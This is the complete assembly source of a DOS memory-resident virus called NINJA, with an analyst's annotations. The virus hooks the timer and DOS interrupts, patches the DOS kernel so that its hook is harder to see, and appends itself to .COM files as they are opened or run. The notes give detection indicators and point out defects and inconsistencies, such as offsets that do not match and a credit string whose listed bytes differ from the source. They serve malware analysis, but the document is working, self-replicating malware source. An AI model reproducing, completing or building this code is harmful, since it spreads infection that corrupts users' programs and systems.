;NINJA virus v1.1 _sandoz_

;I don't believe that NINJA scans; it was developed from Soviet-bloc virus
;code that was acquired late in 1988. For this reason some features are missing,
;such as original encryption, which really won't be missed. However, some features
;are rather unique. System Violator's Virus Mutator and some luck were used.
;An oldie, but interesting.
; Single-segment .COM layout: code, data and stack share one segment and
; all segment registers are assumed equal. Code starts at 100h, directly
; after the 256-byte PSP, which is why the infector below treats
; "host size + 100h" as the in-memory offset of the appended virus body.
cseg segment

assume cs:cseg, ds:cseg, es:cseg, ss:cseg
org 100h

;-----------------------------------------------------------------------
; Host entry stub (5 bytes: BB imm16 / FF E3).
; This is exactly what the infector writes over the first five bytes of
; a victim .COM (see d_A2D8/d_A2D9 at the end): load BX with the offset
; at which the body was appended, then jump there. BX thereby becomes
; the virus base register: every "add si/di/ax,<const>" in the body is
; an offset relative to l_0146, so the body runs wherever it was
; appended. Note for analysts: the "already infected" test in s_0329
; only inspects this BBh opcode byte, so any host that happens to start
; with "mov bx,imm16" is skipped by the infector.
;-----------------------------------------------------------------------
l_0100: mov bx,offset l_0146 ;0100.BB 0146
jmp bx ;Register jump ;0103 FF E3

;-------victim code----------------------------------------------
; ...
; In this listing the host is a 41h-byte placeholder (0105h..0145h);
; in an infected file it is whatever the host held before the stub.
org 0146h

;=======virus code begin=========================================
; in resident virus this code begins at 9000h:0A000h
; Consequently every absolute address of the form 0Axxxh used below is
; 0A000h + (listing offset - 0146h), e.g. 0317h -> 0A1D1h; when the body
; runs inside a host the same locations are reached BX-relative. The
; body spans 0146h..0441h = 02FBh bytes, the length used by the copy
; and write loops.
;----------------------------------------------------------------
;-----------------------------------------------------------------------
; First-run loader (executes inside the infected host, before it).
; Entry state: BX = offset of l_0146 in the host; CS=DS=ES=SS (.COM).
; 1. Save DS/ES/AX for the host and restore its original first 5 bytes
;    from d_A2D3 (BX+02D3h) to offset 100h.
; 2. Save the int 8 (timer tick) vector into r_00E6 (BX+0E6h) and point
;    int 8 at l_019D (BX+57h) through s_0193.
; 3. Spin at l_0175 until the timer interrupt fires; the handler detects
;    that it interrupted this loop, installs the resident copy, and
;    returns to l_0177 by editing the saved return IP.
; 4. l_0177 restores int 8 again, restores the host's registers and
;    jumps to 100h to run the repaired host.
; Why installation is routed through the timer interrupt is not visible
; here. Observable behaviour: a transient int 8 hook from a freshly
; started .COM, then a 02FBh-byte copy to 9000h:0A000h.
; NOTE(review): the NOP lines carry no encoding and the listed offsets
; around them are contiguous (0148h -> 0149h), so they appear not to be
; part of the original image; assembling them would shift every
; hard-coded offset constant in the body.
;-----------------------------------------------------------------------
l_0146: push ds ;<- Entry into virus ;0146 1E
push es ;0147 06
push ax ;0148 50
NOP
push ds ;<-victim code restore ;0149 1E
pop es ;014A 07

; ds:si = BX+02D3h = d_A2D3 (saved original 5 bytes), es:di = 100h.
mov si,bx ;entry offset into the virus;014B 8B F3
add si,02D3h ;(419)changed code saved;014D.81 C6 02D3
mov di,0100h ;changed code address ;0151.BF 0100
mov cx,5 ;length of change ;0154 B9 0005
rep movsb ;0157 F3/ A4
push ds ;0159 1E

; Copy the int 8 vector from 0000:0020h into r_00E6 (BX+0E6h), the
; operand of the far jump that ends the handler (022Bh).
xor ax,ax ;<- get int 8 ;015A 31 C0
push ax ;015C 50

pop ds ;015D 1F
mov si,20h ;int 8h ;015E.BE 0020
mov di,bx ;0161 8B FB
add di,0E6h ;(022Ch)=old int 8 ;0163.81 C7 00E6
mov cx,4 ;0167 B9 0004
rep movsb ;016A F3/ A4
; New int 8 = ES:AX = host segment : BX+57h (l_019D); ES still holds
; the host segment from the push ds / pop es above.
mov ax,bx ;016C 8B C3
add ax,57h ;(019Dh)=continuat. adr.;016E 05 0057
call s_0193 ;0171 E8 001F

pop ds ;0174 1F
; Busy-wait for the next tick. The handler compares the interrupted IP
; with BX+2Fh (= 0175h) to recognise that it landed here.
l_0175: jmp short l_0175 ;int 8 waiting loop ;0175 EB FE

;<----- return after int 8 service-------------------------------
; Reached only through the handler's edit of the saved return IP (see
; l_01B4). The handler already restored the int 8 vector at
; 01BFh..01CFh, so this second restore is redundant.
; NOTE(review): the source says 0E9h, but the listed encoding
; (81 C6 E6 00) and the save above use 0E6h; 0E9h would copy from
; 022Fh, three bytes past r_00E6 - 0E6h appears to be intended.
l_0177: cli ;<- int 8 vector restore;0177 FA
xor ax,ax ;0178 31 C0
mov es,ax ;017A 8E C0
mov di,0020h ;017C.BF 20 00
mov si,bx ;017F 8B F3

add si,0E9h ;(022Ch) ;0181.81 C6 E6 00
mov cx,4 ;0185 B9 04 00
repz movsb ;0188 F3 / A4
sti ;018A FB
NOP
; Restore the host's registers (pushed at 0146h..0148h) and run it from
; its repaired entry point.
pop ax ;<- run victim programm ;018B 58
pop es ;018C 07
pop ds ;018D 1F
mov bx,0100h ;execution begin address;018E.BB 00 01

jmp bx ;0191 FF E3


;<----- "get int 8" routine -------------------------------------
; Store ES:AX as the int 8 vector at 0000:0020h.
; In:  DS = 0 (set by the caller), AX = handler offset, ES = handler
;      segment. Interrupts are masked around the two stores so a tick
;      cannot observe a half-written vector.
; Out: nothing. Clobbers: flags only (cli/sti).
; Despite the banner this routine SETS the vector; saving the old one
; is done inline by the caller just before the call.
s_0193 proc near
cli ; Disable interrupts ;0193 FA
mov ds:[20h],ax ;0194 A3 0020
mov ds:[22h],es ;0197 8C 06 0022
sti ; Enable interrupts ;019B FB

retn ;019C C3
s_0193 endp

;<----- code executed after interrupt int 8----------------------
;-----------------------------------------------------------------------
; Temporary int 8 (timer tick) handler installed by l_0146.
; Stack after the ten pushes: [bp+14h] = IP, [bp+16h] = CS,
; [bp+18h] = FLAGS of the interrupted code; the pushf at entry saves
; the flags as they are at handler entry (IF cleared by the interrupt).
; If the interrupted IP is not the wait loop (BX+2Fh = 0175h) this tick
; interrupted something else: fall through to l_0220 and chain to the
; original handler. BX is meaningful as the virus base only because the
; wait loop leaves it set; for any other interrupted code the compare
; simply fails.
; Otherwise:
;   - bump the saved return IP so the iret resumes past the loop;
;   - put the original int 8 vector back (from r_00E6 = CS:BX+0E6h);
;   - unless 9000h:0A000h already starts with 1Eh (push ds, the first
;     byte of the body), copy the 02FBh-byte body there;
;   - try the three DOS-version-specific hooks s_0230/s_027D/s_02CA
;     (each returns ZF=1 on success); otherwise hook int 21h directly
;     in the vector table ("brute" path).
; Notes for analysts: no DOS memory-allocation call is visible in this
; listing, so the copy at 9000h:0A000h is not protected from being
; overwritten, and the "installed" check is a single byte (1Eh).
;-----------------------------------------------------------------------
l_019D: pushf ;019D 9C
push ax ;019E 50
push bx ;019F 53
push cx ;01A0 51
push dx ;01A1 52

push si ;01A2 56
push di ;01A3 57
push es ;01A4 06
push ds ;01A5 1E
push bp ;01A6 55

mov bp,sp ;01A7 8B EC
mov ax,bx ;base to virus code ;01A9 8B C3
add ax,2Fh ;(175h) ;01AB 05 002F

; [bp+14h] is the interrupted IP (ten words were pushed above it), not
; the CS named in the inline comment.
cmp ss:[bp+14h],ax ;interrupted code CS seg;01AE 36 39 46 14
jnz l_0220 ;-> we must wait again ;01B2 75 6C

; NOTE(review): an unsuffixed "14" is decimal (0Eh) in MASM, which would
; patch the saved BX instead of the return IP; the listed encoding
; (46 14) and the cmp above both use 14h. Also, by the listed offsets
; 0175h+3 = 0178h (xor ax,ax), so the cli at l_0177 is skipped rather
; than executed as the inline comment suggests.
l_01B4: add word ptr ss:[BP+14],3 ;chng ret addr to l_0177;01B4 36 83 46 14 03

;<- restore int 8 vector
; DS = 0 for the vector-table stores; the old vector is read CS-relative
; from r_00E6 (CS is the host segment, where this handler lives).
push ds ;02B9 1E
xor ax,ax ;01BA 31 C0
push ax ;01BC 50

POP DS ;01BD 1F
CLI ;01BE FA
MOV AX,cs:[BX+00E6h] ;(022Ch) old int 8 vect ;01BF 2E 8B 87 E6 00
MOV ds:[20h],AX ;01C4 A3 20 00
MOV AX,cs:[BX+00E8h] ;01C7 2E 8B 87 E8 00
MOV ds:[22h],AX ;01CC A3 22 00
POP DS ;01CF 1F

; Install the resident copy: ds:si = host:BX (DS is back to the
; interrupted code's DS, i.e. the host segment), es:di = 9000h:0A000h.
MOV AX,9000h ;memory last 64KB ;01D0 B8 00 90

MOV ES,AX ;01D3 8E C0
MOV SI,BX ;virus code begin ;01D5 8B F3
MOV DI,0A000h ;the last 24KB of mem ;01D7 BF 00 A0
MOV AL,es:[DI] ;01DA 26 8A 05
CMP AL,1Eh ;allready installed ? ;01DD 3C 1E
JZ l_0220 ;-> yes, end of job ;01DF 74 3F
MOV CX,02FBh ;virus code length ;01E1 B9 FB 02
REPZ MOVSB ;copy virus code ;01E4 F3 / A4
;<- Make link to DOS
; Each hook routine returns ZF=1 when it recognised the DOS kernel and
; patched it, ZF=0 otherwise (the failing fingerprint compare leaves ZF
; clear and pop/ret do not touch flags).

CALL s_0230 ;first DOS version ;01E6 E8 47 00
JZ l_0220 ;-> O.K. ;01E9 74 35
CALL s_027D ;Second DOS version ;01EB E8 8F 00
JZ l_0220 ;-> O.K. ;01EE 74 30
CALL s_02CA ;third DOS version ;01F0 E8 D7 00
JZ l_0220 ;-> O.K. ;01F3 74 2B

;<- Unknown DOS version, BRUTE installation
; Fallback: copy the int 21h vector (0000:0084h) into both far-pointer
; slots of the resident copy (d_A1DF at 9000h:0A1DFh, d_A2CE at
; 9000h:0A2CEh) and point int 21h at T_A1D1 (9000h:0A1D1h). Unlike the
; three kernel-patch paths, this one is visible as a changed int 21h
; entry in the interrupt vector table.
MOV AX,9000h ;01F5 B8 00 90

PUSH AX ;01F8 50
POP ES ;01F9 07
XOR AX,AX ;01FA 31 C0
PUSH AX ;01FC 50
POP DS ;01FD 1F
MOV AX,ds:[84h] ;01FE A1 84 00
MOV es:[0A1DFh],AX ;(0325) ;0201 26 A3 DF A1
MOV es:[0A2CEh],AX ;(0414) ;0205 26 A3 CE A2
MOV AX,ds:[86h] ;0209 A1 86 00

MOV es:[0A1E1h],AX ;(0327) ;020C 26 A3 E1 A1
MOV es:[0A2D0h],AX ;(0416) ;0210 26 A3 D0 A2
MOV AX,0A1D1h ;(0317) new int 21h hndl;0214 B8 D1 A1
MOV ds:[84h],AX ;int 21h ;0217 A3 84 00
MOV AX,9000h ;resident virus segment ;021A B8 00 90
MOV ds:[86h],AX ;021D A3 86 00

; Common exit: unwind the ten pushes and chain to the original int 8
; handler through the far jump assembled below. popf reinstates the
; entry flags (IF clear); the following sti re-enables interrupts, so
; the original handler runs with IF set. (The listed offsets in this
; epilogue are inconsistent: 0221h appears twice.)
l_0220: pop bp ;0220 5D
pop ds ;0221 1F

pop es ;0221 07
pop di ;0222 5F
pop si ;0223 5E
pop dx ;0224 5A
pop cx ;0226 59
pop bx ;0227 5B
pop ax ;0228 58
popf ;0229 9D
sti ;022A FB

; "jmp far" opcode followed by its operand r_00E6: offset, then segment,
; of the saved original int 8 vector. It is filled in at run time by
; l_0146; 0BC2:00AB is just the value captured when this listing was
; made.
db 0EAh ;022B EA
r_00E6 db 0ABh,00h,0C2h,0Bh ;022C AB 00 C2 0B
; jmp 0BC2:00AB ;-> original int 8


;================================================================
; Make link to DOS - first DOS version
;----------------------------------------------------------------
; Kernel-patch hook, variant 1.
; Reads the segment of the current int 21h handler from the vector
; table (0000:0086h) and checks a 3-byte fingerprint at offset 100h of
; that segment (E9 53 22). On a match, the far pointer stored at offset
; 1223h of that segment is copied into both saved-vector slots of the
; resident copy (d_A2CE at 9000h:0A2CEh and d_A1DF at 9000h:0A1DFh) and
; then overwritten with 9000h:0A1D1h (T_A1D1). s_027D and s_02CA are
; the same routine with a different fingerprint and patch offset.
; Out: ZF=1 on success (xor ax,ax / cmp al,ah), ZF=0 when the
;      fingerprint does not match (left clear by the failing compare).
; Clobbers: AX, BX, CX, SI, DI; DS/ES preserved. BX - the caller's
;      virus-base register - is overwritten and not restored; harmless
;      only because the caller makes no further BX-relative access.
; Detection note: on this path the int 21h entry in the vector table is
; left untouched, so tools that only compare vector-table entries will
; not see the hook; the redirected pointer lives inside the DOS kernel
; segment. What DOS uses that pointer for is not visible here.
;----------------------------------------------------------------
s_0230: PUSH DS ;0230 1E

PUSH ES ;0231 06
XOR AX,AX ;<- check possibility ;0232 31 C0
PUSH AX ;0234 50
POP DS ;0235 1F
MOV AX,ds:[86h] ;original int 21h seg ;0236 A1 86 00
PUSH AX ;0239 50
POP DS ;023A 1F
MOV BX,0100h ;023B BB 00 01
CMP BYTE PTR [BX],0E9h ;023E 80 3F E9

JNZ l_027A ;-> unknown system ;0241 75 37
INC BX ;0243 43
CMP BYTE PTR [BX],53h ;0244 80 3F 53
JNZ l_027A ;-> unknown system ;0247 75 31
INC BX ;0249 43
CMP BYTE PTR [BX],22h ;024A 80 3F 22
JNZ l_027A ;-> unknown system ;024D 75 2B

;<- make link to DOS
; Save the pointer at kernel:1223h into both slots of the resident copy.

MOV AX,9000h ;024F B8 00 90
MOV ES,AX ;0252 8E C0

MOV SI,1223h ;0254 BE 23 12
MOV DI,0A2CEh ;(0414) ;0257 BF CE A2
MOV CX,4 ;025A B9 04 00
REPZ MOVSB ;025D F3 / A4

MOV SI,1223h ;025F BE 23 12

MOV DI,0A1DFh ;(0325) ;0262 BF DF A1
MOV CX,4 ;0265 B9 04 00
REPZ MOVSB ;0268 F3 / A4

; Redirect that pointer to the resident int 21h filter.
MOV AX,0A1D1h ;(0317)=new int 21h hndl;026A B8 D1 A1
MOV ds:[1223h],AX ;026D A3 23 12
MOV AX,9000h ;0270 B8 00 90
MOV ds:[1225h],AX ;0273 A3 25 12


; Signal success to the caller: ZF=1.
XOR AX,AX ;0276 31 C0
CMP AL,AH ;0278 38 E0

l_027A: pop es ;027A 07
pop ds ;027B 1F
retn ;027C C3


;================================================================
; Make link to DOS - second DOS version
;----------------------------------------------------------------
; Kernel-patch hook, variant 2: identical in structure to s_0230, with
; fingerprint E9 CA 13 at kernel:100h and the far pointer at
; kernel:011Dh. See s_0230 for the contract, the ZF convention and the
; clobbered BX.
;----------------------------------------------------------------
s_027D: push ds ;027D 1E
push es ;027E 06
xor ax,ax ;<- check possibility ;027F 31 C0
push ax ;0281 50
pop ds ;0282 1F
mov ax,ds:[86h] ;original int 21h seg ;0283 A1 0086
push ax ;0286 50
pop ds ;0287 1F

; Fingerprint check at kernel:100h.
mov bx,0100h ;0288 .BB 0100
cmp byte ptr [bx],0E9h ;028B 80 3F E9
jne l_02C7 ;-> unknown system ;028E 75 37
inc bx ;0290 43
cmp byte ptr [bx],0CAh ;0291 80 3F CA
jne l_02C7 ;-> unknown system ;0294 75 31
inc bx ;0296 43
cmp byte ptr [bx],13h ;0297 80 3F 13
jne l_02C7 ;-> unknown system ;029A 75 2B


;<- make link to DOS
; Save kernel:011Dh into d_A2CE and d_A1DF of the resident copy.
mov ax,9000h ;029C B8 9000
mov es,ax ;029F 8E C0
mov si,011Dh ;02A1 .BE 011D
mov di,0A2CEh ;(0414) ;02A4 .BF A2CE
mov cx,4 ;02A7 B9 0004
rep movsb ;02AA F3/ A4
mov si,011Dh ;02AC .BE 011D

mov di,0A1DFh ;(0325) ;02AF .BF A1DF
mov cx,4 ;02B2 B9 0004
rep movsb ;02B5 F3/ A4

; Redirect it to T_A1D1 at 9000h:0A1D1h.
mov ax,0A1D1h ;(0317)=new int 21h hndl;02B7 B8 A1D1
mov ds:[011Dh],ax ;02BA A3 011D
mov ax,9000h ;02BD B8 9000
mov ds:[011Fh],ax ;02C0 A3 011F


; ZF=1 = success.
xor ax,ax ;02C3 31 C0
cmp al,ah ;02C5 38 E0

l_02C7: pop es ;02C7 07
pop ds ;02C8 1F
retn ;02C9 C3

;===============================================================
; Make link to DOS - third DOS version
;---------------------------------------------------------------
; Kernel-patch hook, variant 3: same structure as s_0230, with
; fingerprint E9 15 05 at kernel:100h and the far pointer at
; kernel:040Fh. See s_0230 for the contract, the ZF convention and the
; clobbered BX.
;---------------------------------------------------------------
s_02CA: push ds ;02CA 1E
push es ;02CB 06
xor ax,ax ;<- check possibility ;02CC 31 C0
push ax ;02CE 50
pop ds ;02CF 1F
mov ax,ds:[86h] ;original int 21h seg ;02D0 A1 0086
push ax ;02D3 50
pop ds ;02D4 1F

; Fingerprint check at kernel:100h.
mov bx,100h ;02D5 .BB 0100
cmp byte ptr [bx],0E9h ;02D8 80 3F E9
jne l_0314 ;-> unknown system ;02DB 75 37
inc bx ;02DD 43
cmp byte ptr [bx],15h ;02DE 80 3F 15
jne l_0314 ;-> unknown system ;02E1 75 31
inc bx ;02E3 43
cmp byte ptr [bx],5 ;02E4 80 3F 05
jne l_0314 ;-> unknown system ;02E7 75 2B


;<- make link to DOS
; Save kernel:040Fh into d_A2CE and d_A1DF of the resident copy.
mov ax,9000h ;02E9 B8 9000
mov es,ax ;02EC 8E C0

mov si,0040Fh ;02EE .BE 040F
mov di,0A2CEh ;(0414) ;02F1 .BF A2CE
mov cx,4 ;02F4 B9 0004
rep movsb ;02F7 F3/ A4


mov si,0040Fh ;02F9 .BE 040F
mov di,0A1DFh ;(0325) ;02FC .BF A1DF
mov cx,4 ;02FF B9 0004
rep movsb ;0302 F3/ A4

; Redirect it to T_A1D1 at 9000h:0A1D1h.
mov ax,0A1D1h ;(0317)=new int 21h hndl;0304 B8 A1D1
mov ds:[040Fh],ax ;0307 A3 040F
mov ax,9000h ;030A B8 9000

mov ds:[0411h],ax ;030D A3 0411

; ZF=1 = success.
xor ax,ax ;0310 31 C0
cmp al,ah ;0312 38 E0

l_0314: pop es ;0314 07
pop ds ;0315 1F
retn ;0316 C3


;==========================================================================
; New int 21h handling subroutine
;--------------------------------------------------------------------------
; Resident int 21h filter, reached either through the vector table
; (brute path) or through the patched kernel pointer.
; Only AH is examined: 3Dh (open) and 4Bh (load/execute) go through the
; infector s_0329 first; AL is not checked, so every open mode and every
; 4Bh sub-function qualifies. Every request then continues to the saved
; original handler via the far jump assembled at l_0324 (opcode byte
; followed by d_A1DF, which is overwritten at install time; the value
; below is the one captured when this listing was made).
; Behavioural indicator: a .COM file opened or executed on an infected
; system is immediately re-opened read/write and grows by 02FBh bytes.
;--------------------------------------------------------------------------
T_A1D1: cmp ah,3Dh ;open file ? ;0317 80 FC 3D
je l_0321 ;-> Yes ;031A 74 05
cmp ah,4Bh ;load&execute/load ovl ?;031C 80 FC 4B
jne l_0324 ;-> No ;031F 75 03
l_0321: call s_0329 ;-> infect file ;0321 E8 0005


l_0324: db 0EAh ;<- original int 21h ;0324 EA
d_A1DF dw 1460h,0273h ;old int 21h ;0325 60 14 73 02
; jmp far ptr 0273:1460

;==========================================================================
; Infecting subroutine
;--------------------------------------------------------------------------
; In:  DS:DX = ASCIIZ path of the file being opened/executed (the
;      caller's int 21h arguments); CS = resident segment.
; Out: nothing; all registers restored. A qualifying file is extended
;      with the 02FBh-byte body and its first 5 bytes replaced by the
;      entry stub (d_A2D8).
; Steps:
;  1. Hook int 24h (critical error) to T_A2C9 so a failing or
;     write-protected disk raises no Abort/Retry/Fail prompt; the old
;     vector is saved in d_A2E0.
;  2. Find '.' in the path (at most 40h bytes) and compare the next
;     three bytes with 'COM' (case-sensitive, uppercase only).
;  3. Clear the read-only attribute, open read/write, read the first
;     5 bytes into d_A2D3; skip if the first byte is already BBh.
;  4. Seek to EOF for the size; if AX <= 0FA00h store size+100h in
;     d_A2D9, append the body from CS:0A000h, seek to 0 and write the
;     5-byte stub.
;  5. Close, restore attributes, restore int 24h.
; All DOS calls go through s_0412 (direct far call to the saved entry).
; Defects visible in the code (kept as-is, see the inline notes):
;  - the 'COM' match tests CX instead of ZF after repe cmpsb, so a
;    mismatch on the third character still counts as a match;
;  - the attribute save at 037Dh writes to the caller's DS, and the
;    restore at 03EBh is issued with DS:DX no longer pointing at the
;    path, so a read-only victim stays writable after infection;
;  - the early exits (no '.', not COM, open error) bypass the int 24h
;    restore, so the T_A2C9 stub stays installed for the process;
;  - only AX of the DX:AX file size is checked;
;  - no call to read or set the file timestamp is visible, so infected
;    files carry a fresh modification time.
;--------------------------------------------------------------------------
s_0329 proc near
push ax ;0329 50

push bx ;032A 53
push cx ;032B 51
push dx ;032C 52
push ds ;032D 1E
push di ;032E 57
push si ;032F 56
push es ;0330 06
push ds ;0331 1E
push es ;0332 06

; Step 1: copy the int 24h vector (0000:0090h) into d_A2E0 and replace
; it with CS:0A2C9h (T_A2C9). The inner push ds/push es pair above is
; popped again right after. This happens before the extension check, so
; every filtered open/exec passes through here.
NOP
xor ax,ax ;<- get int 24h ;0333 31 C0
push ax ;0335 50
pop ds ;0336 1F
push cs ;0337 0E
pop es ;0338 07
mov si,90h ;int 24h vector ;0339 .BE 0090
mov di,0A2E0h ;(0426)-old vector safes;033C .BF A2E0
mov cx,4 ;double word ;033F B9 0004

rep movsb ;0342 F3/ A4
mov ax,0A2C9h ;(040F)=new int 24h ;0344 B8 A2C9
mov ds:[90h],ax ;0347 A3 0090
mov ds:[92h],cs ;034A 8C 0E 0092
NOP
pop es ;034E 07
pop ds ;034F 1F
; Step 2: scan the caller's path for '.' (ES:DI = DS:DX). The scan is
; bounded by 40h bytes rather than by the NUL terminator, so it can run
; past a short path into whatever follows; a '.' found exactly at the
; 64th byte leaves CX=0 and is treated as "not found".
mov di,dx ;file path ;0350 8B FA
push ds ;0352 1E

pop es ;0353 07
mov cx,40h ;find dot ;0354 B9 0040
mov al,2Eh ;0357 B0 2E
repne scasb ;0359 F2/ AE
cmp cx,0 ;035B 83 F9 00
jne l_0363 ;035E 75 03
jmp l_0406 ;-> no file extension ;0360 E9 00A3

; Compare the three bytes after '.' (DS:SI) with d_A2DD = 'COM'
; (ES:DI, ES = CS). NOTE(review): repe cmpsb decrements CX on every
; iteration, so after three compares CX is 0 whether or not the third
; byte matched; the check should test ZF (je/jne), not CX. As written
; e.g. ".COX" qualifies. Lowercase ".com" never matches.
l_0363: push cs ;0363 0E

pop es ;0364 07
mov si,di ;0365 8B F7
mov di,0A2DDh ;(0423)='COM' ;0367 .BF A2DD
mov cx,3 ;036A B9 0003
repe cmpsb ;036D F3/ A6
cmp cx,0 ;036F 83 F9 00
je l_0377 ;0372 74 03
jmp l_0406 ;-> it isn't *.COM ;0374 E9 008F


;<- *.COM file infection
; Step 3. DS:DX still addresses the caller's path here.
; NOTE(review): the store below carries no segment override (encoding
; 89 0E A2E4), so CX goes to caller_DS:0A2E4h, not to d_A2E4 in the
; resident copy; the restore at 03E7h runs with DS=CS and reads d_A2E4,
; which this routine never updates. Two bytes of the caller's segment
; are overwritten in the process.
l_0377: mov ax,4300h ;Get file attributes ;0377 B8 4300
call s_0412 ;int 21h call ;037A E8 0095
mov ds:[0A2E4h],cx ;(042A) ;037D 89 0E A2E4

and cx,0FFFEh ;no R/O ;0381 81 E1 FFFE
mov ax,4301h ;Set file attributes ;0385 B8 4301
call s_0412 ;int 21h call ;0388 E8 0087


; Open read/write. On failure this exits through l_0406, which lies
; after the int 24h restore, so the T_A2C9 hook stays in place.
mov ah,3Dh ;Open File ;038B B4 3D
mov al,2 ;R/W access ;038D B0 02
call s_0412 ;int 21h call ;038F E8 0080
jc l_0406 ;-> Opening Error ;0392 72 72
; From here DS = CS: buffers and the body are addressed in the resident
; copy, and the caller's path is no longer reachable through DS:DX.
push cs ;0394 0E
pop ds ;0395 1F
mov bx,ax ;file handle ;0396 8B D8
mov dx,0A2D3h ;(0419) = file buffer ;0398 BA A2D3
mov cx,5 ;bytes count ;039B B9 0005

mov ah,3Fh ;read file ;039E B4 3F
call s_0412 ;int 21h call ;03A0 E8 006F

; Infection marker: first byte == BBh (the stub's "mov bx,imm16"). Any
; host that happens to start with that opcode is skipped; the byte
; count of a short read (AX) is not checked.
mov ah,0BBh ;allready infected ? ;03A3 B4 BB
cmp ah,ds:[0A2D3h] ;(0419) ;03A5 3A 26 A2D3
je l_03E2 ;-> yes, close file ;03A9 74 37
; Step 4: seek to EOF; DOS returns the size in DX:AX, only AX is tested.
xor cx,cx ;03AB 31 C9
xor dx,dx ;03AD 31 D2
mov ah,42h ;Move file ptr ;03AF B4 42

mov al,2 ;EOF + offset ;03B1 B0 02
call s_0412 ;int 21h call ;03B3 E8 005C

cmp ax,0FA00h ;file size =<64000 ;03B6 3D FA00
ja l_03E2 ;-> above, close file ;03B9 77 27
; d_A2D9 = host size + 100h = offset of l_0146 once the file is loaded
; at 100h; it becomes the imm16 of the stub written below.
add ax,100h ;PSP length ;03BB 05 0100
mov ds:[0A2D9h],ax ;(041F) - vir.begin addr;03BE A3 A2D9
; Append the 02FBh-byte body straight from the resident image.
mov ah,40h ;Write file ;03C1 B4 40
mov dx,0A000h ;address of buffer ;03C3 BA A000

mov cx,2FBh ;bytes count ;03C6 B9 02FB
call s_0412 ;int 21h call ;03C9 E8 0046

; Seek back to offset 0 and overwrite the first 5 bytes with the stub
; (BB <d_A2D9> FF E3). The original 5 bytes travel inside the appended
; body as d_A2D3 (body+02D3h).
xor cx,cx ;03CC 31 C9
xor dx,dx ;03CE 31 D2
mov ah,42h ;Move file ptr ;03D0 B4 42
mov al,0 ;BOF + offset ;03D2 B0 00
call s_0412 ;int 21h call ;03D4 E8 003B


mov ah,40h ;Write file ;03D7 B4 40
mov dx,0A2D8h ;(041E)=BOF virus code ;03D9 BA A2D8
mov cx,5 ;code length ;03DC B9 0005
call s_0412 ;int 21h call ;03DF E8 0030

; Step 5: close, then "restore" attributes. NOTE(review): at 03EBh
; DS=CS and DX holds a buffer offset or the seek result, not the
; caller's path, so this set-attributes call cannot apply to the
; victim; the read-only bit cleared at 0385h is never put back.
l_03E2: mov ah,3Eh ;close file ;03E2 B4 3E
call s_0412 ;int 21h call ;03E4 E8 002B

mov cx,ds:[0A2E4h] ;(042A) - old atribute ;03E7 8B 0E A2E4

mov ax,4301h ;set file attributes ;03EB B8 4301
call s_0412 ;int 21h call ;03EE E8 0021
; Restore int 24h from d_A2E0. Only the full path reaches this; if an
; earlier exit left T_A2C9 installed, a later pass saves that stub as
; the "old" vector and the real one is lost for this process.
push ds ;03F1 1E
push es ;03F2 06

xor ax,ax ;restore int 24h vector ;03F3 31 C0
push ax ;03F5 50
pop es ;03F6 07
push cs ;03F7 0E

pop ds ;03F8 1F
mov di,90h ;int 24h vector ;03F9 .BF 0090
mov si,0A2E0h ;(0426) - old int 24h ;03FC .BE A2E0
mov cx,4 ;double word ;03FF B9 0004
rep movsb ;0402 F3/ A4
pop es ;0404 07
pop ds ;0405 1F
; Common exit; the early exits land here with int 24h still hooked.
l_0406: pop es ;<- EXIT ;0406 07
pop si ;0407 5E

pop di ;0408 5F
pop ds ;0409 1F
pop dx ;040A 5A
pop cx ;040B 59
pop bx ;040C 5B
pop ax ;040D 58
retn ;040E C3
s_0329 endp


;================================================================
; int 24h handling routine (only infection time)
;----------------------------------------------------------------
; Critical-error handler installed by s_0329 for the duration of an
; infection attempt: returns action code 0 in AL ("ignore"), so DOS
; shows no Abort/Retry/Fail prompt on, e.g., a write-protected disk.
; Because several exit paths of s_0329 skip the restore, this stub can
; remain the process's int 24h handler afterwards; silently ignored disk
; errors are therefore a visible symptom.
;----------------------------------------------------------------
T_A2C9: mov al,0 ;ignore critical error ;040F B0 00
iret ;0411 CF

;================================================================
; hidden int 21h call
;----------------------------------------------------------------
; Invoke the saved original DOS entry point directly: pushf + far call
; pushes flags, CS and IP the way "int 21h" would, but bypasses the
; vector table, so neither this virus's own T_A1D1 filter nor any other
; int 21h hook sees the infector's own calls. The 9Ah opcode byte is
; followed by d_A2CE (offset, segment), filled in at install time;
; 0273:1460 is the value captured for this listing. The same slot is
; used whether the pointer came from the vector table (brute path) or
; from the kernel-internal pointer patched by s_0230/s_027D/s_02CA.
;----------------------------------------------------------------

s_0412 proc near
pushf ;0412 9C
db 9Ah ;0413 9A
d_A2CE dw 1460h,0273h ;old int 21h ;0414 60 14 73 02
;call far ptr 0273:1460
retn ;0418 C3
s_0412 endp

;<----- original BOF code
; Scratch copy of the victim's first 5 bytes, filled by the read at
; 039Eh and copied back over the host at run time by l_0146 (BX+02D3h).
; 31 0D 0A 32 0D is whatever was captured for this listing.
d_A2D3 db 31h,0Dh,0Ah,32h,0Dh ;0419 31 0D 0A 32 0D

;<----- virus BOF code
; The 5-byte entry stub written over the host's start: mov bx,<d_A2D9>
; / jmp bx. d_A2D9 is set per infection to host size + 100h.
d_A2D8 db 0BBh ;041E BB
d_A2D9 dw 0146h ;virus begin address ;041F 46 01
dw 0E3FFh ;0421 FF E3

;<----- work bytes
; Extension pattern (uppercase only), saved int 24h vector, and the
; saved-attributes word (see the notes in s_0329 on how the last two
; are actually used).
d_A2DD db 'COM' ;file extension pattern ;0423 43 4F 4D
d_A2E0 dw 0556h,1232h ;old int 24h vector ;0426 56 05 32 12
d_A2E4 dw 0 ;file attributes ;042A 00 00

;<----- just my way of sayin' howdy
; Unreferenced credit string. NOTE(review): the listed bytes decode to
; 'PC-FLU by WIZARD 1991' (21 bytes, so the body ends exactly at
; 0146h+02FBh = 0441h), not to the 23-byte literal in the source; with
; the longer literal the body overruns the 02FBh copy/write length by
; two bytes (harmless, the string is never read). The string is thus
; not a stable signature across variants.
db '-=NINJA=- <sandoz 1993>' ;042C 50 43 2D 46 4C 55
; 20 62 79 20 57 49
; 5A 41 52 44 20 31
; 39 39 31
cseg ends

end l_0100